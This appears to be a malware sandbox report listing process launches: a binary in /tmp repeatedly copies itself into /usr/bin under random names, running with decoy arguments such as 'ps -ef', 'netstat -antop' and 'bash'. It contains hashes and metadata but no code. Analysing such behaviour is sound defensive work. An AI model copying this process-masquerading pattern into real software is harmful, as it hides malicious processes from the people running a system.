                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:/usr/bin/vdaqfdcrtx sh 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:51
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vdaqfdcrtx
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:463633af9af1cdf80b749f3e011adfa1

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:/usr/bin/vyvijtmtnz "ifconfig eth0" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:/usr/bin/vyvijtmtnz bash 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:/usr/bin/vyvijtmtnz "netstat -antop" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:/usr/bin/vyvijtmtnz "ifconfig eth0" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:/usr/bin/vyvijtmtnz "ifconfig eth0" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:25:56
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vyvijtmtnz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:b83b68030fb7999845ce985c2ff676ae

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:/usr/bin/vggdimllrz who 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:/usr/bin/vggdimllrz "sleep 1" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:/usr/bin/vggdimllrz sh 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:02
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:/usr/bin/vggdimllrz bash 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:02
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:01
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:02
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:02
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:/usr/bin/vggdimllrz "grep \"A\"" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:02
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/vggdimllrz
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:c6b06d43564b070c6bd2759e06e402a2

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:/usr/bin/dowmukqhnk ifconfig 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:/usr/bin/dowmukqhnk ls 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:/usr/bin/dowmukqhnk "ps -ef" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:/usr/bin/dowmukqhnk "sleep 1" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:/usr/bin/dowmukqhnk ls 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:07
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dowmukqhnk
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:0d8777ed6e9f2a06a4b26f364e044244

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:/usr/bin/ejrpibbjio "echo \"find\"" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:/usr/bin/ejrpibbjio "cd /etc" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:/usr/bin/ejrpibbjio "grep \"A\"" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:/usr/bin/ejrpibbjio "ls -la" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:/usr/bin/ejrpibbjio "sleep 1" 4554
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:12
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ejrpibbjio
                                                                                Arguments:n/a
                                                                                File size:625911 bytes
                                                                                MD5 hash:912d89d5f0a301b51e44cb5abee3dfdf

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:/usr/bin/ztfvwcbmzm "echo \"find\"" 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:/usr/bin/ztfvwcbmzm whoami 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:/usr/bin/ztfvwcbmzm gnome-terminal 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:/usr/bin/ztfvwcbmzm sh 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:/usr/bin/ztfvwcbmzm sh 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:17
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ztfvwcbmzm
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:e1397eee698786136742d875d10177ca

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:/usr/bin/getzgxvgyl "cat resolv.conf" 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:/usr/bin/getzgxvgyl "echo \"find\"" 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:/usr/bin/getzgxvgyl "ls -la" 4554
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a

                                                                                General

                                                                                Start time:00:26:22
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/getzgxvgyl
                                                                                Arguments:n/a
                                                                                File size:625922 bytes
                                                                                MD5 hash:bc5ec5fe87f5d79b8c779995fd03ec4a

                                                                                General

